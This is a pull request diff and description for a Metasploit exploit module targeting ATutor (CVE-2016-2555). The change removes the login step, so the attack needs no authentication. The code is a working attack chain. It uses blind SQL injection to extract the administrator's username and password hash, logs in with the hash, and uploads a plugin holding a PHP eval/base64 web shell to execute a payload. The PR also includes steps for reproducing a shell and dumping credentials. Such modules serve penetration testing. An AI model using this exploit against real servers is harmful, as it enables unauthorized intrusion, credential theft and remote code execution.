### PR TITLE
Update ATutor - Remove Login Code

### DIFF
--- a/modules/exploits/multi/http/atutor_sqli.rb
+++ b/modules/exploits/multi/http/atutor_sqli.rb
@@ -17,10 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
          This module exploits a SQL Injection vulnerability and an authentication weakness
          vulnerability in ATutor. This essentially means an attacker can bypass authenication
-         and reach the administrators interface where they can upload malcious code.
-
-         You are required to login to the target to reach the SQL Injection, however this
-         can be done as a student account and remote registration is enabled by default.
+         and reach the administrators interface where they can upload malicious code.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -30,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2016-2555'  ],
-          [ 'URL', 'http://www.atutor.ca/' ] # Official Website
+          [ 'URL', 'http://www.atutor.ca/' ],                        # Official Website
+          [ 'URL', 'http://sourceincite.com/research/src-2016-08/']  # Advisory
         ],
       'Privileged'     => false,
       'Payload'        =>
@@ -46,8 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
-        OptString.new('USERNAME', [true, 'The username to authenticate as']),
-        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
       ],self.class)
   end
 
@@ -65,14 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     # the only way to test if the target is vuln
-    begin
-      test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
-    rescue Msf::Exploit::Failed => e
-      vprint_error(e.message)
-      return Exploit::CheckCode::Unknown
-    end
-
-    if test_injection(test_cookie)
+    if test_injection()
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Safe
@@ -86,8 +75,8 @@ class MetasploitModule < Msf::Exploit::Remote
     @plugin_name  = Rex::Text.rand_text_alpha_lower(3)
 
     path = "#{@plugin_name}/#{@payload_name}.php"
-    register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")
-
+    # this content path is where the ATutor authors recommended to install it
+    register_file_for_cleanup("#{@payload_name}.php", "/var/content/module/#{path}")
     zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
     zip_file.pack
   end
@@ -97,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
       'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
-    })
+    }, timeout = 0.1)
   end
 
   def upload_shell(cookie)
@@ -111,7 +100,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
       'cookie' => cookie,
-      'agent' => 'Mozilla'
     })
 
     if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
@@ -119,116 +107,68 @@ class MetasploitModule < Msf::Exploit::Remote
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
          'cookie' => cookie,
-         'agent'  => 'Mozilla',
        })
        if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
           res = send_request_cgi({
             'method' => 'GET',
             'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
             'cookie' => cookie,
-            'agent'  => 'Mozilla',
           })
        return true
        end
     end
-
-    # auth failed if we land here, bail
+    # unknown failure...
     fail_with(Failure::Unknown, "Unable to upload php code")
     return false
   end
 
-  def get_hashed_password(token, password, bypass)
-    if bypass
-      return Rex::Text.sha1(password + token)
-    else
-      return Rex::Text.sha1(Rex::Text.sha1(password) + token)
-    end
-  end
-
-  def login(username, password, bypass)
-    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, "login.php"),
-      'agent' => 'Mozilla',
-    })
-
-    token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
-    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
-    if bypass
-      password = get_hashed_password(token, password, true)
-    else
-      password = get_hashed_password(token, password, false)
-    end
-
+  def login(username, hash)
+    password = Rex::Text.sha1(hash)
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, "login.php"),
       'vars_post' => {
         'form_password_hidden' => password,
         'form_login' => username,
-        'submit' => 'Login'
+        'submit' => 'Login',
+        'token' => ''
       },
-      'cookie' => cookie,
-      'agent' => 'Mozilla'
     })
-    cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
-
-    # this is what happens when no state is maintained by the http client
-    if res && res.code == 302
-       if res.redirection.to_s.include?('bounce.php?course=0')
-        res = send_request_cgi({
-          'method'   => 'GET',
-          'uri'      => normalize_uri(target_uri.path, res.redirection),
-          'cookie' => cookie,
-          'agent' => 'Mozilla'
-        })
-        cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
-        if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
-           res = send_request_cgi({
-             'method'   => 'GET',
-             'uri'      => normalize_uri(target_uri.path, res.redirection),
-             'cookie' => cookie,
-             'agent' => 'Mozilla'
-           })
-           cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
-           return cookie
-          end
-       else res.redirection.to_s.include?('admin/index.php')
-          # if we made it here, we are admin
-          return cookie
-       end
+    # poor developer practices
+    cookie = "ATutorID=#{$4};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/
+    if res && res.code == 302 && res.redirection.to_s.include?('admin/index.php')
+      # if we made it here, we are admin
+      report_cred(user: username, password: hash)
+      return cookie
     end
-
     # auth failed if we land here, bail
     fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
     return nil
   end
 
-  def perform_request(sqli, cookie)
+  def perform_request(sqli)
     # the search requires a minimum of 3 chars
     sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
     rand_key = Rex::Text.rand_text_alpha(1)
     res = send_request_cgi({
       'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
+      'uri'      => normalize_uri(target_uri.path, "mods", "_standard", "social", "index_public.php"),
       'vars_post' => {
         "search_friends_#{rand_key}" => sqli,
         'rand_key' => rand_key,
-        'search' => 'Search People'
+        'search' => 'Search'
       },
-      'cookie' => cookie,
-      'agent' => 'Mozilla'
     })
     return res.body
   end
 
-   def dump_the_hash(cookie)
+   def dump_the_hash()
     extracted_hash = ""
     sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
-    login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i
+    login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli).to_i
     for i in 1..login_and_hash_length
        sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
-       asciival = generate_sql_and_test(false, false, sqli, cookie)
+       asciival = generate_sql_and_test(false, false, sqli)
        if asciival >= 0
           extracted_hash << asciival.chr
        end
@@ -236,13 +176,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return extracted_hash.split(":")
   end
 
-  def get_ascii_value(sql, cookie)
+  # greetz to rsauron & the darkc0de crew!
+  def get_ascii_value(sql)
     lower = 0
     upper = 126
     while lower < upper
        mid = (lower + upper) / 2
        sqli = "#{sql}>#{mid}"
-       result = perform_request(sqli, cookie)
+       result = perform_request(sqli)
        if result =~ /There are \d+ entries\./
         lower = mid + 1
        else
@@ -253,7 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote
        value = lower
     else
        sqli = "#{sql}=#{lower}"
-       result = perform_request(sqli, cookie)
+       result = perform_request(sqli)
        if result =~ /There are \d+ entries\./
           value = lower
        end
@@ -261,27 +202,27 @@ class MetasploitModule < Msf::Exploit::Remote
     return value
   end
 
-  def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
+  def generate_sql_and_test(do_true=false, do_test=false, sql=nil)
     if do_test
       if do_true
-        result = perform_request("1=1", cookie)
+        result = perform_request("1=1")
         if result =~ /There are \d+ entries\./
           return true
         end
       else not do_true
-        result = perform_request("1=2", cookie)
+        result = perform_request("1=2")
         if not result =~ /There are \d+ entries\./
           return true
         end
       end
     elsif not do_test and sql
-      return get_ascii_value(sql, cookie)
+      return get_ascii_value(sql)
     end
   end
 
-  def test_injection(cookie)
-    if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie)
-       if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie)
+  def test_injection()
+    if generate_sql_and_test(do_true=true, do_test=true, sql=nil)
+       if generate_sql_and_test(do_true=false, do_test=true, sql=nil)
         return true
        end
     end
@@ -303,6 +244,8 @@ class MetasploitModule < Msf::Exploit::Remote
       private_data: opts[:password],
       origin_type: :service,
       private_type: :password,
+      private_type: :nonreplayable_hash,
+      jtr_format: 'sha512',
       username: opts[:user]
     }.merge(service_data)
 
@@ -316,24 +259,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
-    print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
-    report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
-
-    print_status("Dumping username and password hash...")
-    # we got admin hash now
-    credz = dump_the_hash(student_cookie)
-    print_good("Got the #{credz[0]} hash: #{credz[1]} !")
+    print_status("Dumping the username and password hash...")
+    credz = dump_the_hash()
     if credz
-      admin_cookie = login(credz[0], credz[1], true)
-      print_status("Logged in as #{credz[0]}, uploading shell...")
-      # install a plugin
+      print_good("Got the #{credz[0]}'s hash: #{credz[1]} !")
+      admin_cookie = login(credz[0], credz[1])
       if upload_shell(admin_cookie)
-        print_good("Shell upload successful!")
-        # boom
         exec_code
       end
     end
   end
 end
-


### PR DESCRIPTION
## What This PR Does

This PR removes the login code from atutor_sqli, because turns out it's not necessary.
## Verification
- [x] Start a Ubuntu box (this was tested on Ubuntu 14)
- [x] Download http://iweb.dl.sourceforge.net/project/atutor/ATutor%202/ATutor-2.2.1.tar.gz
- [x] Extract ATutor. Edit include/classes/pclzip.lib.php, find this line:

``` php
if (!function_exists('gzopen'))
```

And change to:

``` php
if (!function_exists('gzopen64'))
```
- [x] Go to ATutor with a browser and install it
- [x] Start msfconsole
- [x] Do: `workspace -a atutor` to create the new workspace
- [x] Do: `use exploit/multi/http/atutor_sqli`
- [x] Do: `set rhost [IP]`
- [x] Do: `run`
- [ ] You should get a shell
- [ ] Exit the Meterpreter prompt
- [x] Do: `creds`, you should see the hash
